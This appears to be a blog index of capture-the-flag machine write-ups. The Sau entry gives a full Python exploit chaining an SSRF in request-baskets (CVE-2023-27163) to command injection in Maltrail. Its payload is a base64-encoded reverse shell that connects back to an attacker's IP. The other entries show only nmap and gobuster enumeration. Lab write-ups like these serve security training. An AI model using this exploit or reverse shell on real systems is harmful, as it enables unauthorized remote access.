
Sau Writeup

Enumeration

Nmap

PORT      STATE SERVICE
22/tcp    open  ssh
55555/tcp open  unknown

Request Basket

Connecting over HTTP to port 55555 showed a service called request-basket.

Exploitation

CVE-2023-27163

#!/usr/bin/env python3
import requests
import sys
import random
import string
import base64
import time

def ensure_http_schema(url):
    if not url.startswith(("http://", "https://")):
        return "http://" + url
    return url

def generate_basket_name(length=6):
    return ''.join(random.choices(string.ascii_lowercase, k=length))

def create_proxy_basket(server_url, forward_url):
    if not server_url.endswith("/"):
        server_url += "/"
    basket_name = generate_basket_name()
    api_url = f"{server_url}api/baskets/{basket_name}"
    payload = {
        "forward_url": forward_url,
        "proxy_response": True,
        "insecure_tls": False,
        "expand_path": True,
        "capacity": 250
    }
    print(f"[+] Creating proxy basket '{basket_name}' pointing to {forward_url}")
    r = requests.post(api_url, json=payload)
    if r.status_code not in [200, 201]:
        print(f"[!] Failed to create basket: {r.status_code} {r.text}")
        sys.exit(1)
    token = r.json().get("token")
    basket_url = f"{server_url}{basket_name}"
    print(f"[+] Basket created: {basket_url}")
    print(f"[+] Authorization Token: {token}")
    return basket_url

def send_reverse_shell(proxy_url, attacker_ip, attacker_port):
    print("[+] Encoding reverse shell payload...")
    payload = f"""python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{attacker_ip}",{attacker_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("sh")'"""
    b64_payload = base64.b64encode(payload.encode()).decode()
    injected_payload = f'`echo {b64_payload} | base64 -d | bash`'
    print("[+] Sending command injection via proxy to /login...")
    response = requests.post(f"{proxy_url}/login", data={"username": f";{injected_payload}"})
    if response.status_code in [200, 302]:
        print("[+] Exploit sent successfully! Check your listener.")
    else:
        print(f"[!] Exploit may have failed. HTTP {response.status_code}: {response.text}")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]} <attacker_ip> <attacker_port> <request_baskets_url>")
        print(f"Example: {sys.argv[0]} 10.10.10.10 8000 http://10.129.229.26:55555")
        sys.exit(1)
    attacker_ip = sys.argv[1]
    attacker_port = int(sys.argv[2])
    request_baskets_url = ensure_http_schema(sys.argv[3])
    proxy_target_url = "http://127.0.0.1:80"
    proxy_url = create_proxy_basket(request_baskets_url, proxy_target_url)
    time.sleep(3)
    send_reverse_shell(proxy_url, attacker_ip, attacker_port)

PoC source: GitHub - bl4ckarch/ssrf_to_rce_sau: A simple python script that exploits, Service side request forgery on the request-basket 1.2.1 version then Unauith Command injection via Vulnerable parameter

The payload is delivered through the SSRF to the internal service on port 80. A reverse shell is obtained through the RCE vulnerability in Maltrail running on port 80.

Privilege Escalation

sudo -l

Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

With sudo -l we check which commands can be run as root. /usr/bin/systemctl status could be run.

/usr/bin/systemctl --version
systemd 245 (245.4-4ubuntu3.22)

Checking the systemd version showed 245.4.

CVE-2023-26604

💀 Exploit for systemd 246 - Local Privilege Escalation CVE-2023-26604 ...

November 2, 2025 · 2 min · 353 words · Me

Updown Writeup

Enumeration

Nmap

command
sudo nmap -p- target -T4

result
Nmap scan report for target (10.129.227.227)
Host is up (0.24s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Ports 22 and 80 are open.

command
sudo nmap -p 22,80 -sC -sV target

result
Host is up (0.24s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
|   256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_  256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...

October 13, 2025 · 4 min · 769 words · Me

Busqueda Writeup

Enumeration

Nmap

command
sudo nmap -sC -sV target -T4

result
Nmap scan report for 10.129.228.217
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_  256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://searcher.htb/
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

The http and ssh ports are open.

gobuster

command
gobuster dir -u http://target -w ~/wordlists/dirb/common.txt

result
Progress: 0 / 1 (0.00%)
2025/10/10 14:04:20 the server returns a status code that matches the provided options for non existing urls. http://target/4a437574-206b-45c5-80a3-853688eb8182 => 302 (redirect to http://searcher.htb/) (Length: 276). Please exclude the response length or the status code or set the wildcard option.. To continue please exclude the status code or the length

The server redirects to searcher.htb, so we edit /etc/hosts to map the target IP to that hostname. ...

October 10, 2025 · 4 min · 644 words · Me

Stapler Writeup

About this lab

Utilize enumeration, web enumeration, and WordPress enumeration techniques to identify vulnerabilities. Engage in database enumeration and implement privilege escalation strategies. Additionally, harness the abuse of sudo permissions to enhance your access. This lab is designed to capitalize on your skills in vulnerability exploitation.

Enumeration

Nmap

command
sudo nmap -p- -T4 target

result
Host is up (0.098s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   open   doom
3306/tcp  open   mysql
12380/tcp open   unknown

command ...

September 19, 2025 · 4 min · 700 words · Me

Insanity Hosting Writeup

About this lab

Engage in enumeration, web enumeration, and exploiting SQL injection techniques to identify vulnerabilities. Utilize password cracking methods and implement privilege escalation strategies to enhance your access. This lab is designed to capitalize on your skills in vulnerability exploitation.

Enumeration

Nmap

command
sudo nmap -p- -T4 target

First, we have to scan all of the target ports.

result
Host is up (0.10s latency).
Not shown: 65369 filtered tcp ports (no-response), 163 filtered tcp ports (host-prohibited)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

The ftp, ssh, and http ports are open.

command ...

September 10, 2025 · 5 min · 999 words · Me